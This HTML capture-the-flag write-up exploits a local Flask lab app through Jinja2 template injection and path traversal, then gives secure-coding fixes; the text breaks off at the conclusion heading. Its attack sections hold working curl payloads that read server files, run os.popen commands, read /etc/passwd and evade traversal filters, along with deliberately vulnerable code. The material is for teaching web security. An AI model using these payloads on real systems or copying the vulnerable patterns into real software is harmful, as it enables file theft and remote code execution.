<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Press Leak CTF - Complete Exploitation Writeup</title>
    <style>
        @page {
            margin: 2cm;
        }
        
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: 'Georgia', 'Times New Roman', serif;
            line-height: 1.8;
            color: #2c3e50;
            background: #ffffff;
            padding: 40px;
            max-width: 1000px;
            margin: 0 auto;
        }
        
        .header {
            text-align: center;
            margin-bottom: 50px;
            padding-bottom: 30px;
            border-bottom: 4px solid #e74c3c;
        }
        
        .header h1 {
            font-size: 3em;
            color: #2c3e50;
            margin-bottom: 15px;
            font-weight: bold;
        }
        
        .header .subtitle {
            font-size: 1.3em;
            color: #7f8c8d;
            font-style: italic;
            margin-bottom: 10px;
        }
        
        .header .meta {
            font-size: 1em;
            color: #95a5a6;
            margin-top: 20px;
        }
        
        .toc {
            background: #ecf0f1;
            padding: 30px;
            border-radius: 8px;
            margin-bottom: 40px;
            page-break-inside: avoid;
        }
        
        .toc h2 {
            color: #2c3e50;
            margin-bottom: 20px;
            font-size: 1.8em;
        }
        
        .toc ol {
            margin-left: 20px;
        }
        
        .toc li {
            margin: 10px 0;
            font-size: 1.1em;
        }
        
        .toc a {
            color: #3498db;
            text-decoration: none;
            font-weight: 600;
        }
        
        .toc a:hover {
            color: #2980b9;
            text-decoration: underline;
        }
        
        section {
            margin-bottom: 50px;
            page-break-inside: avoid;
        }
        
        h2 {
            color: #e74c3c;
            font-size: 2.2em;
            margin-bottom: 25px;
            padding-bottom: 15px;
            border-bottom: 3px solid #ecf0f1;
            page-break-after: avoid;
        }
        
        h3 {
            color: #3498db;
            font-size: 1.6em;
            margin: 30px 0 20px 0;
            page-break-after: avoid;
        }
        
        h4 {
            color: #16a085;
            font-size: 1.3em;
            margin: 25px 0 15px 0;
            page-break-after: avoid;
        }
        
        p {
            margin-bottom: 20px;
            text-align: justify;
        }
        
        .info-box {
            background: #e8f4f8;
            border-left: 6px solid #3498db;
            padding: 20px 25px;
            margin: 25px 0;
            border-radius: 5px;
            page-break-inside: avoid;
        }
        
        .info-box strong {
            color: #2980b9;
            display: block;
            margin-bottom: 10px;
            font-size: 1.1em;
        }
        
        .warning-box {
            background: #fff3cd;
            border-left: 6px solid #ffc107;
            padding: 20px 25px;
            margin: 25px 0;
            border-radius: 5px;
            page-break-inside: avoid;
        }
        
        .warning-box strong {
            color: #856404;
            display: block;
            margin-bottom: 10px;
            font-size: 1.1em;
        }
        
        .success-box {
            background: #d4edda;
            border-left: 6px solid #28a745;
            padding: 20px 25px;
            margin: 25px 0;
            border-radius: 5px;
            page-break-inside: avoid;
        }
        
        .success-box strong {
            color: #155724;
            display: block;
            margin-bottom: 10px;
            font-size: 1.1em;
        }
        
        .danger-box {
            background: #f8d7da;
            border-left: 6px solid #dc3545;
            padding: 20px 25px;
            margin: 25px 0;
            border-radius: 5px;
            page-break-inside: avoid;
        }
        
        .danger-box strong {
            color: #721c24;
            display: block;
            margin-bottom: 10px;
            font-size: 1.1em;
        }
        
        code {
            background: #f4f4f4;
            padding: 3px 8px;
            border-radius: 3px;
            font-family: 'Courier New', monospace;
            font-size: 0.95em;
            color: #e74c3c;
        }
        
        pre {
            background: #2c3e50;
            color: #2ecc71;
            padding: 20px;
            border-radius: 5px;
            overflow-x: auto;
            margin: 20px 0;
            font-family: 'Courier New', monospace;
            font-size: 0.9em;
            line-height: 1.5;
            page-break-inside: avoid;
        }
        
        pre code {
            background: none;
            padding: 0;
            color: #2ecc71;
        }
        
        .code-header {
            background: #34495e;
            color: #ecf0f1;
            padding: 10px 20px;
            border-radius: 5px 5px 0 0;
            font-weight: bold;
            margin-bottom: -20px;
            margin-top: 20px;
            font-size: 0.9em;
        }
        
        ul, ol {
            margin: 20px 0 20px 40px;
        }
        
        li {
            margin: 10px 0;
        }
        
        .payload {
            background: #fff9e6;
            border: 2px solid #ffc107;
            padding: 20px;
            border-radius: 5px;
            margin: 20px 0;
            page-break-inside: avoid;
        }
        
        .payload-title {
            color: #856404;
            font-weight: bold;
            margin-bottom: 10px;
            font-size: 1.1em;
        }
        
        .flag {
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            color: white;
            padding: 15px 25px;
            border-radius: 8px;
            font-family: 'Courier New', monospace;
            font-size: 1.2em;
            font-weight: bold;
            text-align: center;
            margin: 25px 0;
            box-shadow: 0 5px 15px rgba(102, 126, 234, 0.3);
            page-break-inside: avoid;
        }
        
        .step {
            background: #f8f9fa;
            border-left: 4px solid #16a085;
            padding: 20px;
            margin: 20px 0;
            border-radius: 5px;
            page-break-inside: avoid;
        }
        
        .step-number {
            color: #16a085;
            font-weight: bold;
            font-size: 1.2em;
            margin-bottom: 10px;
        }
        
        table {
            width: 100%;
            border-collapse: collapse;
            margin: 20px 0;
            page-break-inside: avoid;
        }
        
        th, td {
            border: 1px solid #ddd;
            padding: 12px;
            text-align: left;
        }
        
        th {
            background: #3498db;
            color: white;
            font-weight: bold;
        }
        
        tr:nth-child(even) {
            background: #f8f9fa;
        }
        
        .footer {
            margin-top: 60px;
            padding-top: 30px;
            border-top: 3px solid #ecf0f1;
            text-align: center;
            color: #7f8c8d;
            font-style: italic;
        }
        
        @media print {
            body {
                padding: 0;
            }
            
            .header {
                page-break-after: always;
            }
            
            h2 {
                page-break-before: always;
            }
            
            h2:first-of-type {
                page-break-before: avoid;
            }
        }
    </style>
</head>
<body>
    <div class="header">
        <h1>🗞️ Press Leak CTF Challenge</h1>
        <div class="subtitle">Complete Exploitation Writeup</div>
        <div class="meta">
            <p><strong>Challenge Type:</strong> Web Exploitation (SSTI & LFI)</p>
            <p><strong>Difficulty:</strong> Medium</p>
            <p><strong>Author:</strong> Sudeepa Wanigarathna</p>
        </div>
    </div>

    <div class="toc">
        <h2>📋 Table of Contents</h2>
        <ol>
            <li><a href="#overview">Challenge Overview</a></li>
            <li><a href="#reconnaissance">Initial Reconnaissance</a></li>
            <li><a href="#flag1">FLAG1: Server-Side Template Injection (SSTI)</a></li>
            <li><a href="#flag2">FLAG2: Local File Inclusion (LFI)</a></li>
            <li><a href="#mitigation">Secure Coding & Mitigation</a></li>
            <li><a href="#conclusion">Conclusion</a></li>
        </ol>
    </div>

    <section id="overview">
        <h2>1. Challenge Overview</h2>
        
        <p>
            Welcome to the <strong>Press Leak CTF Challenge</strong>! This is a web application security challenge 
            that simulates a real-world scenario where you've been hired as a security consultant by "GlobalNews", 
            a major news organization. An anonymous whistleblower has claimed that their internal article management 
            system has serious security flaws that could expose confidential documents and source information.
        </p>

        <div class="info-box">
            <strong>Mission Objective:</strong>
            <p>
                Investigate the GlobalNews internal system, identify vulnerabilities, and recover two classified 
                flags that prove the system's weaknesses before malicious actors can exploit them.
            </p>
        </div>

        <h3>Challenge Details</h3>
        <table>
            <tr>
                <th>Property</th>
                <th>Value</th>
            </tr>
            <tr>
                <td><strong>Application Name</strong></td>
                <td>GlobalNews Internal Article Management System</td>
            </tr>
            <tr>
                <td><strong>Technology Stack</strong></td>
                <td>Flask (Python), Jinja2 Templates</td>
            </tr>
            <tr>
                <td><strong>Vulnerabilities</strong></td>
                <td>Server-Side Template Injection (SSTI), Local File Inclusion (LFI)</td>
            </tr>
            <tr>
                <td><strong>Flags to Capture</strong></td>
                <td>2 (FLAG1 via SSTI, FLAG2 via LFI)</td>
            </tr>
            <tr>
                <td><strong>Access URL</strong></td>
                <td>http://localhost:5000</td>
            </tr>
        </table>

        <h3>What You'll Learn</h3>
        <ul>
            <li><strong>Server-Side Template Injection (SSTI)</strong> - Understanding how template engines can be exploited</li>
            <li><strong>Jinja2 Exploitation Techniques</strong> - Navigating Python object hierarchy for file access</li>
            <li><strong>Local File Inclusion (LFI)</strong> - Path traversal attacks and directory escaping</li>
            <li><strong>Web Application Security Testing</strong> - Using curl and manual testing techniques</li>
            <li><strong>Secure Coding Practices</strong> - How to prevent these vulnerabilities in production</li>
        </ul>

        <div class="warning-box">
            <strong>⚠️ Ethical Hacking Notice:</strong>
            <p>
                These techniques are for LEGAL, AUTHORIZED testing only. Only use them on systems you own or 
                have explicit written permission to test. Unauthorized access to computer systems is illegal 
                and can result in criminal charges.
            </p>
        </div>
    </section>

    <section id="reconnaissance">
        <h2>2. Initial Reconnaissance</h2>
        
        <p>
            Before diving into exploitation, let's understand the application structure and identify potential 
            attack vectors. The application has two main functionalities that we'll investigate.
        </p>

        <h3>Application Endpoints</h3>

        <h4>Endpoint 1: Article Preview (<code>/preview</code>)</h4>
        <div class="info-box">
            <strong>Details:</strong>
            <ul>
                <li><strong>URL:</strong> http://localhost:5000/preview</li>
                <li><strong>Method:</strong> POST</li>
                <li><strong>Parameters:</strong> title, author, content</li>
                <li><strong>Purpose:</strong> Generates preview of article with user-supplied data</li>
                <li><strong>Potential Vulnerability:</strong> Server-Side Template Injection (SSTI)</li>
            </ul>
        </div>

        <p><strong>Test with normal input:</strong></p>
        <div class="code-header">Command Line Test</div>
        <pre><code>curl -X POST http://localhost:5000/preview \
  -d "title=Test Article" \
  -d "author=John Doe" \
  -d "content=This is a test article."</code></pre>

        <h4>Endpoint 2: Document Viewer (<code>/view_document</code>)</h4>
        <div class="info-box">
            <strong>Details:</strong>
            <ul>
                <li><strong>URL:</strong> http://localhost:5000/view_document</li>
                <li><strong>Method:</strong> GET</li>
                <li><strong>Parameters:</strong> name (filename)</li>
                <li><strong>Purpose:</strong> Displays internal documents</li>
                <li><strong>Potential Vulnerability:</strong> Local File Inclusion (LFI)</li>
            </ul>
        </div>

        <p><strong>Test with legitimate file:</strong></p>
        <div class="code-header">Command Line Test</div>
        <pre><code>curl "http://localhost:5000/view_document?name=company_policy.txt"</code></pre>

        <h3>Vulnerability Assessment</h3>
        <p>
            Based on initial reconnaissance, we've identified two high-risk areas:
        </p>
        <ol>
            <li><strong>Article Preview</strong> - User input is reflected in the response, potentially allowing template injection</li>
            <li><strong>Document Viewer</strong> - Filename parameter directly influences file path construction, allowing path traversal</li>
        </ol>
    </section>

    <section id="flag1">
        <h2>3. FLAG1: Server-Side Template Injection (SSTI)</h2>

        <h3>Understanding the Vulnerability</h3>
        <p>
            Server-Side Template Injection (SSTI) occurs when user-supplied input is embedded into template code 
            without proper sanitization and subsequently processed by the template engine. In this challenge, 
            the Flask application uses Jinja2 templates with a critical flaw.
        </p>

        <div class="danger-box">
            <strong>Vulnerable Code (app.py):</strong>
            <pre><code>@app.route('/preview', methods=['POST'])
def preview():
    article_title = request.form.get('title', 'Untitled')
    article_content = request.form.get('content', '')
    author_name = request.form.get('author', 'Anonymous')
    
    # VULNERABLE: User input directly in template string
    template = f'''
    &lt;h1&gt;{article_title}&lt;/h1&gt;
    &lt;div class="meta"&gt;By {author_name}&lt;/div&gt;
    &lt;div class="content"&gt;{article_content}&lt;/div&gt;
    '''
    
    return render_template_string(template)  # SSTI HERE</code></pre>
        </div>

        <p><strong>Why is this vulnerable?</strong></p>
        <ul>
            <li>User input (title, author, content) is directly inserted into template string using f-string formatting</li>
            <li><code>render_template_string()</code> processes the template, executing any Jinja2 expressions</li>
            <li>Jinja2 evaluates expressions within double curly braces: <code>{{ expression }}</code></li>
            <li>No input validation or sanitization is performed</li>
        </ul>

        <h3>Step-by-Step Exploitation</h3>

        <div class="step">
            <div class="step-number">STEP 1: Detect Template Injection</div>
            <p><strong>Objective:</strong> Confirm that Jinja2 evaluates injected expressions</p>
            
            <div class="payload">
                <div class="payload-title">Payload:</div>
                <code>{{ 7*7 }}</code>
            </div>

            <div class="code-header">Test Command</div>
            <pre><code>curl -X POST http://localhost:5000/preview \
  -d "title=Test" \
  -d "author={{ 7*7 }}" \
  -d "content=Testing SSTI"</code></pre>

            <div class="code-header">Verify Result</div>
            <pre><code>curl -s -X POST http://localhost:5000/preview \
  -d "title=Test" \
  -d "author={{ 7*7 }}" \
  -d "content=Testing" | grep -o "By [^&lt;]*"</code></pre>

            <div class="success-box">
                <strong>Expected Output:</strong>
                <p><code>By 49</code></p>
                <p>If you see "49" instead of "{{ 7*7 }}", SSTI is confirmed! The template engine is evaluating our expression.</p>
            </div>
        </div>

        <div class="step">
            <div class="step-number">STEP 2: Explore Template Context</div>
            <p><strong>Objective:</strong> Identify accessible objects in template context</p>
            
            <div class="payload">
                <div class="payload-title">Payload:</div>
                <code>{{ config }}</code>
            </div>

            <div class="code-header">Test Command</div>
            <pre><code>curl -X POST http://localhost:5000/preview \
  -d "title={{ config }}" \
  -d "author=Test" \
  -d "content=Test"</code></pre>

            <div class="success-box">
                <strong>Expected Output:</strong>
                <p>Flask configuration object details including:</p>
                <code>&lt;Config {'ENV': 'production', 'DEBUG': False, 'SECRET_KEY': 'press_leak_secret_2024', ...}&gt;</code>
                <p>This confirms we can access Flask's configuration object - our entry point to Python's object hierarchy.</p>
            </div>
        </div>

        <div class="step">
            <div class="step-number">STEP 3: Access Python Built-in Functions</div>
            <p><strong>Objective:</strong> Navigate through object hierarchy to reach built-in functions</p>
            
            <div class="payload">
                <div class="payload-title">Payload:</div>
                <code>{{ config.__class__.__init__.__globals__.keys() }}</code>
            </div>

            <p><strong>Object Hierarchy Explanation:</strong></p>
            <ul>
                <li><code>config</code> - Flask configuration object (entry point)</li>
                <li><code>.__class__</code> - Returns the class type (flask.config.Config)</li>
                <li><code>.__init__</code> - Returns the initialization method of that class</li>
                <li><code>.__globals__</code> - Returns the global namespace dictionary</li>
                <li><code>.keys()</code> - Lists all available items in global namespace</li>
            </ul>

            <div class="info-box">
                <strong>Key Finding:</strong>
                <p>The global namespace contains <code>__builtins__</code>, which provides access to Python's built-in functions like <code>open()</code>, <code>eval()</code>, etc.</p>
            </div>
        </div>

        <div class="step">
            <div class="step-number">STEP 4: Read FLAG1.txt</div>
            <p><strong>Objective:</strong> Use the <code>open()</code> function to read the flag file located at <code>/app/FLAG1.txt</code></p>
            
            <div class="payload">
                <div class="payload-title">Final Exploitation Payload:</div>
                <code>{{ config.__class__.__init__.__globals__['__builtins__'].open('/app/FLAG1.txt').read() }}</code>
            </div>

            <div class="code-header">Exploitation Command</div>
            <pre><code>curl -X POST http://localhost:5000/preview \
  -d "title={{ config.__class__.__init__.__globals__['__builtins__'].open('/app/FLAG1.txt').read() }}" \
  -d "author=Hacker" \
  -d "content=SSTI Attack"</code></pre>

            <div class="code-header">Extract Flag Only</div>
            <pre><code>curl -s -X POST http://localhost:5000/preview \
  -d "title={{ config.__class__.__init__.__globals__['__builtins__'].open('/app/FLAG1.txt').read() }}" \
  -d "author=Test" \
  -d "content=Test" | grep -oP 'FLAG\{[^}]+\}'</code></pre>

            <div class="flag">
                🚩 FLAG{t3mpl4t3_1nj3ct10n_m4st3r_2024}
            </div>

            <div class="success-box">
                <strong>✅ FLAG1 CAPTURED!</strong>
                <p>You've successfully exploited the SSTI vulnerability to read arbitrary files on the server.</p>
            </div>
        </div>

        <h3>Payload Breakdown</h3>
        <div class="info-box">
            <strong>Understanding the Exploitation Chain:</strong>
            <pre><code>{{ config.__class__.__init__.__globals__['__builtins__'].open('/app/FLAG1.txt').read() }}
   │      │         │        │              │           │                          │
   │      │         │        │              │           │                          └─ Read file contents
   │      │         │        │              │           └─ Open file at /app/FLAG1.txt
   │      │         │        │              └─ Access __builtins__ dictionary
   │      │         │        └─ Access global namespace
   │      │         └─ Access __init__ method
   │      └─ Get class of config object
   └─ Flask config object (available in Jinja2 context)</code></pre>
        </div>

        <h3>Alternative SSTI Payloads</h3>
        <p>If the primary payload doesn't work, try these alternative object chains:</p>

        <h4>Alternative 1: Using <code>self</code> object</h4>
        <div class="code-header">Alternative Payload</div>
        <pre><code>curl -s -X POST http://localhost:5000/preview \
  -d "title={{ self.__init__.__globals__.__builtins__.open('/app/FLAG1.txt').read() }}" \
  -d "author=Test" \
  -d "content=Test" | grep -oP 'FLAG\{[^}]+\}'</code></pre>

        <h4>Alternative 2: Using <code>lipsum</code> object</h4>
        <div class="code-header">Alternative Payload</div>
        <pre><code>curl -s -X POST http://localhost:5000/preview \
  -d "title={{ lipsum.__globals__.__builtins__.open('/app/FLAG1.txt').read() }}" \
  -d "author=Test" \
  -d "content=Test" | grep -oP 'FLAG\{[^}]+\}'</code></pre>

        <h4>Alternative 3: Using <code>cycler</code> object</h4>
        <div class="code-header">Alternative Payload</div>
        <pre><code>curl -s -X POST http://localhost:5000/preview \
  -d "title={{ cycler.__init__.__globals__.__builtins__.open('/app/FLAG1.txt').read() }}" \
  -d "author=Test" \
  -d "content=Test" | grep -oP 'FLAG\{[^}]+\}'</code></pre>

        <h3>Advanced SSTI Techniques (Bonus)</h3>
        
        <h4>Execute System Commands</h4>
        <div class="code-header">Command Execution via SSTI</div>
        <pre><code>curl -s -X POST http://localhost:5000/preview \
  -d "title={{ config.__class__.__init__.__globals__['__builtins__'].eval(\"__import__('os').popen('whoami').read()\") }}" \
  -d "author=Test" \
  -d "content=Test"</code></pre>

        <h4>List Files in Directory</h4>
        <div class="code-header">Directory Listing via SSTI</div>
        <pre><code>curl -s -X POST http://localhost:5000/preview \
  -d "title={{ config.__class__.__init__.__globals__['__builtins__'].eval(\"__import__('os').listdir('/app')\") }}" \
  -d "author=Test" \
  -d "content=Test"</code></pre>
    </section>

    <section id="flag2">
        <h2>4. FLAG2: Local File Inclusion (LFI)</h2>

        <h3>Understanding the Vulnerability</h3>
        <p>
            Local File Inclusion (LFI) is a vulnerability that allows attackers to read arbitrary files on the 
            server by manipulating file path parameters. This occurs when user input is used to construct file 
            paths without proper validation, allowing directory traversal using <code>../</code> sequences.
        </p>

        <div class="danger-box">
            <strong>Vulnerable Code (app.py):</strong>
            <pre><code>@app.route('/view_document', methods=['GET'])
def view_document():
    doc_name = request.args.get('name', '')
    
    # VULNERABLE: No path sanitization
    file_path = os.path.join('documents', doc_name)
    
    with open(file_path, 'r') as f:
        content = f.read()</code></pre>
        </div>

        <p><strong>Why is this vulnerable?</strong></p>
        <ul>
            <li>User-controlled <code>doc_name</code> parameter is directly used in file path construction</li>
            <li>No validation to prevent directory traversal sequences (<code>../</code>)</li>
            <li><code>os.path.join()</code> does not sanitize path traversal when second argument contains <code>../</code></li>
            <li>No whitelist of allowed files</li>
            <li>No verification that resolved path stays within intended directory</li>
        </ul>

        <h3>Step-by-Step Exploitation</h3>

        <div class="step">
            <div class="step-number">STEP 1: Test Normal Functionality</div>
            <p><strong>Objective:</strong> Understand how the document viewer constructs file paths</p>
            
            <div class="payload">
                <div class="payload-title">Legitimate Filename:</div>
                <code>company_policy.txt</code>
            </div>

            <div class="code-header">Test Command</div>
            <pre><code>curl "http://localhost:5000/view_document?name=company_policy.txt"</code></pre>

            <div class="info-box">
                <strong>How it works:</strong>
                <p>File path constructed: <code>documents/company_policy.txt</code></p>
                <p>The application successfully reads and displays the company policy document.</p>
            </div>
        </div>

        <div class="step">
            <div class="step-number">STEP 2: Test Path Traversal</div>
            <p><strong>Objective:</strong> Attempt to escape the documents directory</p>
            
            <div class="payload">
                <div class="payload-title">Traversal Payload:</div>
                <code>../app.py</code>
            </div>

            <div class="code-header">Test Command</div>
            <pre><code>curl "http://localhost:5000/view_document?name=../app.py"</code></pre>

            <div class="success-box">
                <strong>Expected Result:</strong>
                <p>You should see the Python source code of app.py, including the vulnerable code!</p>
                <p><strong>Path Resolution:</strong> <code>documents/../app.py</code> → <code>app.py</code></p>
                <p>✅ Successfully escaped the documents directory!</p>
            </div>

            <div class="code-header">Extract Specific Code Section</div>
            <pre><code>curl -s "http://localhost:5000/view_document?name=../app.py" | grep -A 20 "def preview"</code></pre>
        </div>

        <div class="step">
            <div class="step-number">STEP 3: Access System Files</div>
            <p><strong>Objective:</strong> Read sensitive system files to confirm LFI capability</p>
            
            <div class="payload">
                <div class="payload-title">System File Payload:</div>
                <code>../../../etc/passwd</code>
            </div>

            <div class="code-header">Test Command</div>
            <pre><code>curl "http://localhost:5000/view_document?name=../../../etc/passwd"</code></pre>

            <div class="info-box">
                <strong>Path Traversal Logic:</strong>
                <pre><code>Starting point: documents/
After ../      : /app/ (application root)
After ../../   : / (filesystem root)
After ../../../: / (still at root, cannot go higher)
Final path     : /etc/passwd</code></pre>
            </div>

            <div class="success-box">
                <strong>Expected Output:</strong>
                <p>Linux user accounts information:</p>
                <pre><code>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
ctfuser:x:1000:1000::/home/ctfuser:/bin/sh</code></pre>
            </div>
        </div>

        <div class="step">
            <div class="step-number">STEP 4: Read FLAG2.txt</div>
            <p><strong>Objective:</strong> Access the flag file located at <code>/etc/FLAG2.txt</code></p>
            
            <div class="payload">
                <div class="payload-title">Final Exploitation Payload:</div>
                <code>../../../etc/FLAG2.txt</code>
            </div>

            <div class="code-header">Exploitation Command</div>
            <pre><code>curl "http://localhost:5000/view_document?name=../../../etc/FLAG2.txt"</code></pre>

            <div class="code-header">Extract Flag Only</div>
            <pre><code>curl -s "http://localhost:5000/view_document?name=../../../etc/FLAG2.txt" | grep -oP 'FLAG\{[^}]+\}'</code></pre>

            <div class="flag">
                🚩 FLAG{l0c4l_f1l3_1nclus10n_pr0_2024}
            </div>

            <div class="success-box">
                <strong>✅ FLAG2 CAPTURED!</strong>
                <p>You've successfully exploited the LFI vulnerability using path traversal to read arbitrary files.</p>
            </div>
        </div>

        <h3>Path Traversal Visualization</h3>
        <div class="info-box">
            <strong>Container Filesystem Structure:</strong>
            <pre><code>/
├── etc/
│   ├── passwd
│   ├── hosts
│   └── FLAG2.txt          &lt;-- TARGET
├── app/
│   ├── documents/         &lt;-- STARTING POINT
│   │   ├── company_policy.txt
│   │   ├── style_guide.txt
│   │   └── story.txt
│   ├── app.py
│   ├── FLAG1.txt
│   └── templates/
└── usr/
    └── ...

Traversal Path:
documents/              (start)
documents/../           → /app/
documents/../../        → /
documents/../../../     → / (cannot go above root)
documents/../../../etc/ → /etc/
documents/../../../etc/FLAG2.txt → /etc/FLAG2.txt</code></pre>
        </div>

        <h3>Alternative Traversal Depths</h3>
        <p>Different traversal depths may work depending on current directory. Extra traversals are harmless:</p>

        <h4>Option 1: Two Traversals</h4>
        <div class="code-header">Alternative Payload</div>
        <pre><code>curl -s "http://localhost:5000/view_document?name=../../etc/FLAG2.txt" | grep -oP 'FLAG\{[^}]+\}'</code></pre>

        <h4>Option 2: Four Traversals</h4>
        <div class="code-header">Alternative Payload</div>
        <pre><code>curl -s "http://localhost:5000/view_document?name=../../../../etc/FLAG2.txt" | grep -oP 'FLAG\{[^}]+\}'</code></pre>

        <h3>Additional File Access Testing</h3>
        <p>To demonstrate the full impact of the vulnerability, test access to other system files:</p>

        <h4>Read /etc/hosts</h4>
        <div class="code-header">Test Command</div>
        <pre><code>curl "http://localhost:5000/view_document?name=../../../etc/hosts"</code></pre>

        <h4>Read /proc/version (Kernel Information)</h4>
        <div class="code-header">Test Command</div>
        <pre><code>curl "http://localhost:5000/view_document?name=../../../proc/version"</code></pre>

        <h4>Read Dockerfile (Container Configuration)</h4>
        <div class="code-header">Test Command</div>
        <pre><code>curl "http://localhost:5000/view_document?name=../Dockerfile"</code></pre>

        <h4>Read requirements.txt (Dependencies)</h4>
        <div class="code-header">Test Command</div>
        <pre><code>curl "http://localhost:5000/view_document?name=../requirements.txt"</code></pre>

        <h3>LFI Evasion Techniques</h3>
        <p>If basic path traversal is filtered or blocked, try these encoding methods:</p>

        <h4>URL Encoding</h4>
        <div class="code-header">Encoded Payload</div>
        <pre><code>curl "http://localhost:5000/view_document?name=..%2F..%2F..%2Fetc%2FFLAG2.txt"</code></pre>
        <p>Explanation: <code>%2F</code> is URL-encoded forward slash</p>

        <h4>Double URL Encoding</h4>
        <div class="code-header">Double Encoded Payload</div>
        <pre><code>curl "http://localhost:5000/view_document?name=..%252F..%252F..%252Fetc%252FFLAG2.txt"</code></pre>
        <p>Explanation: <code>%25</code> is URL-encoded percent sign, so <code>%252F</code> decodes to <code>%2F</code></p>

        <h4>Dot-Dot-Slash Variations</h4>
        <div class="code-header">Alternative Encoding</div>
        <pre><code>curl "http://localhost:5000/view_document?name=....//....//....//etc/FLAG2.txt"</code></pre>
    </section>

    <section id="mitigation">
        <h2>5. Secure Coding & Mitigation</h2>

        <h3>🛡️ Preventing SSTI Vulnerabilities</h3>

        <h4>❌ Vulnerable Code Pattern</h4>
        <div class="danger-box">
            <pre><code>@app.route('/preview', methods=['POST'])
def preview():
    title = request.form.get('title')
    template = f"&lt;h1&gt;{title}&lt;/h1&gt;"
    return render_template_string(template)  # DANGEROUS!</code></pre>
        </div>

        <h4>✅ Secure Implementation - Option 1: Static Templates</h4>
        <div class="success-box">
            <strong>Recommended Approach:</strong>
            <pre><code>@app.route('/preview', methods=['POST'])
def preview():
    title = request.form.get('title')
    # Pass user input as template variables, not in template string
    return render_template('preview.html', title=title)</code></pre>

            <p><strong>preview.html:</strong></p>
            <pre><code>&lt;h1&gt;{{ title }}&lt;/h1&gt;  &lt;!-- Jinja2 auto-escapes by default --&gt;</code></pre>
        </div>

        <h4>✅ Secure Implementation - Option 2: Explicit Escaping</h4>
        <div class="success-box">
            <pre><code>from markupsafe import escape

@app.route('/preview', methods=['POST'])
def preview():
    title = escape(request.form.get('title'))
    content = escape(request.form.get('content'))
    return render_template('preview.html', title=title, content=content)</code></pre>
        </div>

        <h4>✅ Secure Implementation - Option 3: Sandboxed Environment</h4>
        <div class="success-box">
            <pre><code>from jinja2.sandbox import SandboxedEnvironment

env = SandboxedEnvironment()
template = env.from_string(template_string)
return template.render(user_data=user_input)</code></pre>
        </div>

        <h4>SSTI Prevention Best Practices</h4>
        <ol>
            <li><strong>Never use <code>render_template_string()</code> with user input</strong></li>
            <li><strong>Always use static template files with <code>render_template()</code></strong></li>
            <li><strong>Let Jinja2's auto-escaping handle user data</strong></li>
            <li><strong>Use a sandboxed environment if dynamic templates are necessary</strong></li>
            <li><strong>Implement Content Security Policy (CSP) headers</strong></li>
            <li><strong>Validate and sanitize all user inputs</strong></li>
            <li><strong>Use template engines with limited functionality in user-facing contexts</strong></li>
        </ol>

        <h3>🛡️ Preventing LFI Vulnerabilities</h3>

        <h4>❌ Vulnerable Code Pattern</h4>
        <div class="danger-box">
            <pre><code>@app.route('/view_document')
def view_document():
    filename = request.args.get('name')
    file_path = os.path.join('documents', filename)  # DANGEROUS!
    with open(file_path, 'r') as f:
        return f.read()</code></pre>
        </div>

        <h4>✅ Secure Implementation - Option 1: Whitelist Approach</h4>
        <div class="success-box">
            <strong>Recommended for Limited File Sets:</strong>
            <pre><code>ALLOWED_FILES = {
    'policy': 'documents/company_policy.txt',
    'style': 'documents/style_guide.txt'
}

@app.route('/view_document')
def view_document():
    doc_id = request.args.get('id')
    
    if doc_id not in ALLOWED_FILES:
        return "Document not found", 404
    
    file_path = ALLOWED_FILES[doc_id]
    
    with open(file_path, 'r') as f:
        return f.read()</code></pre>
        </div>

        <h4>✅ Secure Implementation - Option 2: Path Validation</h4>
        <div class="success-box">
            <strong>For Dynamic File Access:</strong>
            <pre><code>import os
from pathlib import Path

DOCUMENT_ROOT = os.path.abspath('documents')

@app.route('/view_document')
def view_document():
    filename = request.args.get('name')
    
    # Remove any path traversal attempts
    filename = os.path.basename(filename)
    
    # Construct and resolve full path
    file_path = os.path.join(DOCUMENT_ROOT, filename)
    real_path = os.path.realpath(file_path)
    
    # Verify path is within allowed directory
    if not real_path.startswith(DOCUMENT_ROOT + os.sep):
        return "Access denied", 403
    
    # Verify file exists and is regular file
    if not os.path.isfile(real_path):
        return "File not found", 404
    
    with open(real_path, 'r') as f:
        return f.read()</code></pre>
        </div>

        <h4>✅ Secure Implementation - Option 3: Flask Built-in Function</h4>
        <div class="success-box">
            <strong>Simplest Secure Approach:</strong>
            <pre><code>from flask import send_from_directory

@app.route('/view_document')
def view_document():
    filename = request.args.get('name')
    
    # send_from_directory automatically prevents path traversal
    return send_from_directory('documents', filename)</code></pre>
        </div>

        <h4>LFI Prevention Best Practices</h4>
        <ol>
            <li><strong>Use whitelisting instead of blacklisting</strong></li>
            <li><strong>Never directly use user input in file paths</strong></li>
            <li><strong>Use <code>os.path.basename()</code> to strip directory components</strong></li>
            <li><strong>Validate resolved paths with <code>os.path.realpath()</code></strong></li>
            <li><strong>Check that resolved path starts with expected directory</strong></li>
            <li><strong>Use <code>send_from_directory()</code> for serving files</strong></li>
            <li><strong>Implement proper access controls</strong></li>
            <li><strong>Run applications with minimal file system permissions</strong></li>
            <li><strong>Log and monitor file access attempts</strong></li>
            <li><strong>Use chroot jails or containers to limit file system access</strong></li>
        </ol>

        <h3>Additional Security Enhancements</h3>

        <h4>Content Security Policy Headers</h4>
        <div class="code-header">Security Headers Implementation</div>
        <pre><code>@app.after_request
def add_security_headers(response):
    response.headers['Content-Security-Policy'] = "default-src 'self'"
    response.headers['X-Content-Type-Options'] = 'nosniff'
    response.headers['X-Frame-Options'] = 'DENY'
    response.headers['X-XSS-Protection'] = '1; mode=block'
    return response</code></pre>

        <h4>Rate Limiting</h4>
        <div class="code-header">Rate Limiting Implementation</div>
        <pre><code>from flask_limiter import Limiter
from flask_limiter.util import get_remote_address

limiter = Limiter(
    app,
    key_func=get_remote_address,
    default_limits=["200 per day", "50 per hour"]
)

@app.route('/preview', methods=['POST'])
@limiter.limit("10 per minute")
def preview():
    # Implementation</code></pre>

        <h4>Comprehensive Logging</h4>
        <div class="code-header">Logging Implementation</div>
        <pre><code>import logging

logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

@app.route('/view_document')
def view_document():
    filename = request.args.get('name')
    logger.info(f"Document access attempt: {filename} from {request.remote_addr}")
    # Implementation with security checks</code></pre>
    </section>

    <section id="conclusion">
